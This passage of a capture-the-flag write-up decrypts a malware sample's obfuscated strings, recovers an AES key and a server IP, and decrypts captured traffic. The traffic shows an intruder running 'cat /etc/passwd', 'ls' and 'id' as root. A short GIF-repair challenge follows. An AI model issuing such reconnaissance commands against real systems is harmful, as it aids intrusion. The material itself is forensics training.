      return var0 != null;
   }
}

Essentially, the strings are hidden behind three different decoders, Blowfish, DES, and XOR, selected by which helper is called: I, Il (IL), or l (L). To streamline the solution, I opted to develop a Python script tailored to automate and resolve this intricate decryption task efficiently.

import base64
import hashlib
from Crypto.Cipher import Blowfish, DES
from Crypto.Util.Padding import unpad

def blowfish_decrypt_b64(b64_ciphertext, key_str):
    # I(): Blowfish, key = MD5(key_str)
    key = hashlib.md5(key_str.encode('utf-8')).digest()
    cipher = Blowfish.new(key, Blowfish.MODE_ECB)
    raw = base64.b64decode(b64_ciphertext)
    dec = cipher.decrypt(raw)
    # Java's Cipher.getInstance("Blowfish") defaults to ECB with PKCS5 padding
    return unpad(dec, Blowfish.block_size)

def des_decrypt_b64(b64_ciphertext, key_str):
    # Il(): DES, key = first 8 bytes of MD5(key_str)
    full_md5 = hashlib.md5(key_str.encode('utf-8')).digest()
    des_key = full_md5[:8]  # first 8 bytes
    cipher = DES.new(des_key, DES.MODE_ECB)
    raw = base64.b64decode(b64_ciphertext)
    dec = cipher.decrypt(raw)
    # Cipher.getInstance("DES") also defaults to ECB with PKCS5 padding
    return unpad(dec, DES.block_size)

def xor_b64(b64_ciphertext, key_str):
    # l
    raw = base64.b64decode(b64_ciphertext)
    out = bytearray(len(raw))
    key = key_str.encode('utf-8')
    for i in range(len(raw)):
        out[i] = raw[i] ^ key[i % len(key)]
    return out

def decode_item(decode_type, ciphertext, key):
    if decode_type == 'I':   # Blowfish
        return blowfish_decrypt_b64(ciphertext, key)
    elif decode_type == 'Il':  # DES
        return des_decrypt_b64(ciphertext, key)
    elif decode_type == 'l':   # XOR
        return xor_b64(ciphertext, key)
    else:
        return b''

entries = [
    ('I',  "eBq0gvhn60zfo1MunQjxEq+VgKjg5XsIv3e9pz85TDc=", "nErxg",  "I[l[0]]"),
    ('l',  "XnpOLQlfekJ7XFwhTC8NXQ==",                  "nCzKk",  "I[l[2]]"),
    ('I',  "7Ep1Z+Gia+U=",                             "UWraX",  "I[l[1]]"),
    ('l',  "GxQcABJfFhgYGgUaRCIDAR0PEw==",              "qujaj",  "I[l[3]]"),
    ('l',  "AjwsJhwWLTkBEQA=",                          "eYXor",  "I[l[4]]"),
    ('l',  "Ewc5RxARAEU4HhERXzg0NiYDBjI=",               "RBjhU",  "I[l[5]]"),
    ('l',  "Lx8HDA==",                                  "FqnxZ",  "I[l[6]]"),
    ('I',  "GHxTbaCWgquBBBSGerx+TiFBtURhB40u",           "KcZiK",  "I[l[7]]"),
    ('Il', "Cf4KGA89+bA=",                              "uMCDA",  "I[l[8]]"),
    ('Il', "o1OzBtlndQ+3+IyNY+3z+HrXBauLHpzj",           "OaiGN",  "I[l[9]]"),
    ('Il', "R5lwGFYcS7eccTUFCOhdLg==",                  "KunRL",  "I[l[10]]"),
    ('l',  "ERwyKBERJj4UAQYbPyA=",                      "trQGu",  "I[l[11]]"),
    ('Il', "2/vFTel4NG6ys7fiFcHEt0wZOsC1vJqXP5GHiA7T9jE=", "dhvCA", "I[l[12]]"),
    ('l',  "fV1yEhJ8XX5ER38GcBAWfg==",                  "MdFtp",  "I[l[13]]"),
    ('l',  "AwoL",                                      "BOXvi",  "I[l[14]]"),
    ('Il', "kqsvxVHphdfXglIktDCFoHPv2dha64mD",           "YbUwj",  "I[l[15]]"),
    ('l',  "Lg8VPC86HgAbIiw=",                          "IjauA",  "I[l[16]]"),
    ('Il', "vLru125xRYdTLHj1VD9qtUsvKbrijfbX",           "RqduM",  "I[l[17]]"),
    ('Il', "xRwDzYljVIU=",                              "fScWC",  "I[l[18]]"),
    ('l',  "EAkMJl8JDRkyAxMcA2k6HxE=",                   "zhzGq",  "I[l[19]]"),
    ('l',  "LyQVKDwqJw==",                              "KKSAR",  "I[l[20]]"),
    ('l',  "CwkvD2gUHDACaCMJKgtwVQ==",                   "ahYnF",  "I[l[21]]"),
    ('Il', "uIHhwTaeAscF3EzVgdL4zg==",                  "tMxGZ",  "I[l[22]]"),
    ('l',  "ChYmChAL",                                  "nsEet",  "I[l[23]]"),
    ('l',  "al9YAjJrX1RUZ2gEWgA2aQ==",                   "ZfldP",  "I[l[24]]"),
    ('l',  "JygSTjMlL24xPSU+dDEXAgkoDxE=",               "fmAav",  "I[l[25]]"),
    ('I',  "EvA8rhxJMXPTCc0Wno5a9Q==",                   "QvZtB",  "I[l[26]]"),
    # l[27] is an int (socket port?), not a string
    ('l',  "OTAxITtw",                                  "zxtbp",  "I[l[28]]"),
    ('Il', "gT9cJw1pjVI=",                              "eTlqI",  "I[l[29]]"),
    ('I',  "BAW3Glpb798=",                              "pExyG",  "I[l[30]]"),
]

def main():
    for decode_type, b64str, key_str, label in entries:
        out = decode_item(decode_type, b64str, key_str)
        try:
            out_str = out.decode('utf-8')
        except UnicodeDecodeError:
            out_str = repr(out)
        print(f"{label} => {out_str}")

if __name__ == '__main__':
    main()

This process ultimately produces the following output:

 $ python solver.py 
I[l[0]] => javax.crypto.spec.SecretKeySpec
I[l[2]] => 094fb198072b6df3
I[l[1]] => AES
I[l[3]] => javax.crypto.Cipher
I[l[4]] => getInstance
I[l[5]] => AES/ECB/PKCS5Padding
I[l[6]] => init
I[l[7]] => java.security.Key
I[l[8]] => doFinal
I[l[9]] => java.util.Base64
I[l[10]] => getEncoder
I[l[11]] => encodeToString
I[l[12]] => javax.crypto.spec.SecretKeySpec
I[l[13]] => 094fb198072b6df3
I[l[14]] => AES
I[l[15]] => javax.crypto.Cipher
I[l[16]] => getInstance
I[l[17]] => AES/ECB/PKCS5Padding
I[l[18]] => init
I[l[19]] => java.security.Key
I[l[20]] => doFinal
I[l[21]] => java.util.Base64
I[l[22]] => getDecoder
I[l[23]] => decode
I[l[24]] => 094fb198072b6df3
I[l[25]] => AES/ECB/PKCS5Padding
I[l[26]] => 198.211.115.148
I[l[28]] => CHECK

I[l[29]] => 

I[l[30]] => 

The recovered strings show that the code encrypts and decrypts data with AES in ECB mode (PKCS5 padding), combined with Base64 encoding and decoding, using the key 094fb198072b6df3. Returning to the PCAP file, we discovered a suspicious packet, number 3255, containing the keyword “CHECK” and Base64-encoded data.

Using Python once again, I Base64-decoded the data and decrypted it with the recovered key, 094fb198072b6df3.

from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# AES key
key = b"094fb198072b6df3"  # Ensure the key is exactly 16 bytes for AES-128

# List of Base64-encoded strings
encoded_strings = [
    "x3rMMuy2zwVIbc22P3Am0A==",
    # (Base64 payload not reproduced here)
    "yUtoUeQN1TmbabEBeju/lQ==",
    # (Base64 payload not reproduced here)
    "r8uCyuorIBZ50N4h2gP2EB5T2MLkkWOettjNwA41K0t5DLFagfNzQ3IAR4db0F3a8IcuKNL12/Sqkv8bz75n5A==",
    "so24GI7XNuUvhmLeYq36D9EuMFYlrcc1pFzYhFb+9Krb3ekzdX0YDu2injt2e6NMVQTEGmecNteWtFB+rLIHpg==",
    "4TgFjZ+LpXEKEWm3Gn7o6Q==",
    "9CUTfxN+OvAl0QEo3YB6+Ebxyop4VelaxCK7DOymaTikGnVpzpNkqHiLiL7bupX6jVbSG4/EGW+HtqGVaZI2TbwtJYqr99BfGxaZ3xAeLocjhgtLq6N+UhxDAf7M1UOvAnGYG2zDAgFtWo1uBcwFPaoSvrXp+Jar8cWyWPrFgtgU4wvHhoZjSlauRsfJE28H"
]

# Function to decode Base64 and decrypt AES
def decode_and_decrypt(encoded_strings, key):
    cipher = AES.new(key, AES.MODE_ECB)
    for encoded in encoded_strings:
        # Decode Base64
        decoded_data = b64decode(encoded)

        # Decrypt AES
        decrypted_data = cipher.decrypt(decoded_data)

        # Remove the PKCS5 padding; keep the raw bytes if the padding is malformed
        try:
            decrypted_data = unpad(decrypted_data, AES.block_size)
        except ValueError:
            pass

        # Print result
        print(decrypted_data.decode(errors="ignore").strip())

# Run the function
decode_and_decrypt(encoded_strings, key)

Here is the resulting output:

 $ python solver2.py 
cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin

ls -alt
total 64
drwxrwxrwt    1 root     root          4096 Jan  8 19:03 tmp
drwxr-xr-x    1 root     root          4096 Jan  8 18:55 .
drwxr-xr-x    1 root     root          4096 Jan  8 18:55 ..
drwxr-xr-x    5 root     root           340 Jan  8 18:55 dev
dr-xr-xr-x  209 root     root             0 Jan  8 18:55 proc
dr-xr-xr-x   13 root     root             0 Jan  8 18:55 sys
-rwxr-xr-x    1 root     root             0 Jan  8 18:55 .dockerenv
drwxr-xr-x    1 root     root          4096 Jan  8 18:55 etc
drwxr-xr-x    1 root     root          4096 Feb 24  2022 app
drwxr-xr-x    1 root     root          4096 Dec 21  2018 lib
drwxr-xr-x    1 root     root          4096 Dec 21  2018 usr
drwxr-xr-x    2 root     root          4096 Dec 20  2018 bin
drwxr-xr-x    2 root     root          4096 Dec 20  2018 home
drwxr-xr-x    5 root     root          4096 Dec 20  2018 media
drwxr-xr-x    2 root     root          4096 Dec 20  2018 mnt
drwx------    2 root     root          4096 Dec 20  2018 root
drwxr-xr-x    2 root     root          4096 Dec 20  2018 run
drwxr-xr-x    2 root     root          4096 Dec 20  2018 sbin
drwxr-xr-x    2 root     root          4096 Dec 20  2018 srv
drwxr-xr-x    1 root     root          4096 Dec 20  2018 var
printf "CJ{w0w_u_are_4_certified_intrusion_analyst_exp3rt!1!}"
"CJ{w0w_u_are_4_certified_intrusion_analyst_exp3rt!1!}"

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

FLAG: CJ{w0w_u_are_4_certified_intrusion_analyst_exp3rt!1!}

Greyscale

Desc: A threat actor hides a secret message on this intentionally-broken GIF.

We are given a broken GIF file.

While searching online, I came across an article detailing the GIF file format. Noticing that the First Data Block matched the one described in the article, I simply copied and pasted the hex data into the corrupted GIF file to repair it.

FLAG: CJ{_s0_15_it_pr0nounc3d_GIF_or_JIF?_}
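
The write-up does not say which bytes of the challenge GIF were damaged, so as an added example (not part of the original write-up) the walker below parses a GIF's block structure and reports the first offset where the file stops being well-formed, which is where a repair like the one above would go. The sample bytes and the `damaged_copy` helper are constructed for illustration.

```python
import struct

# Constructed sample: a 1x1 GIF89a with one graphic control extension.
SAMPLE = bytes.fromhex(
    "47494638396101000100800000"   # signature + logical screen descriptor
    "000000ffffff"                 # global colour table (2 entries)
    "21f9040000000000"             # graphic control extension
    "2c000000000100010000"         # image descriptor
    "0202440100"                   # LZW min code size, one data sub-block, terminator
    "3b")                          # trailer

def _skip_sub_blocks(data, p):
    """Follow a chain of <length><payload> sub-blocks up to the zero-length terminator."""
    while True:
        if p >= len(data):
            raise ValueError(f"sub-block chain runs past EOF at offset {p}")
        size = data[p]
        p += 1 + size
        if size == 0:
            return p

def walk_gif(data):
    """Return (blocks, error): blocks parsed so far and the first structural fault, if any."""
    blocks = []
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        return blocks, f"bad signature {data[:6]!r}"
    try:
        width, height, packed = struct.unpack_from("<HHB", data, 6)
        blocks.append((0, f"header {width}x{height}"))
        pos = 13 + (3 * (2 << (packed & 7)) if packed & 0x80 else 0)
        while True:
            start, tag = pos, data[pos]
            if tag == 0x3B:                       # trailer: clean end of file
                blocks.append((start, "trailer"))
                return blocks, None
            if tag == 0x21:                       # extension: label, then sub-blocks
                blocks.append((start, f"extension 0x{data[pos + 1]:02x}"))
                pos = _skip_sub_blocks(data, pos + 2)
            elif tag == 0x2C:                     # image descriptor + image data
                ipacked = data[pos + 9]
                pos += 10 + (3 * (2 << (ipacked & 7)) if ipacked & 0x80 else 0)
                blocks.append((start, f"image, LZW min code size {data[pos]}"))
                pos = _skip_sub_blocks(data, pos + 1)
            else:
                return blocks, f"unknown block 0x{tag:02x} at offset {start}"
    except (ValueError, IndexError, struct.error) as exc:
        return blocks, f"truncated or corrupt: {exc}"

def damaged_copy(offset, value):
    """Constructed fault: overwrite one byte of SAMPLE."""
    return SAMPLE[:offset] + bytes([value]) + SAMPLE[offset + 1:]
```

Calling `walk_gif(damaged_copy(38, 0xFF))` corrupts the length byte of the first image data sub-block; the walker still lists the header, extension and image descriptor, then reports the broken sub-block chain.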
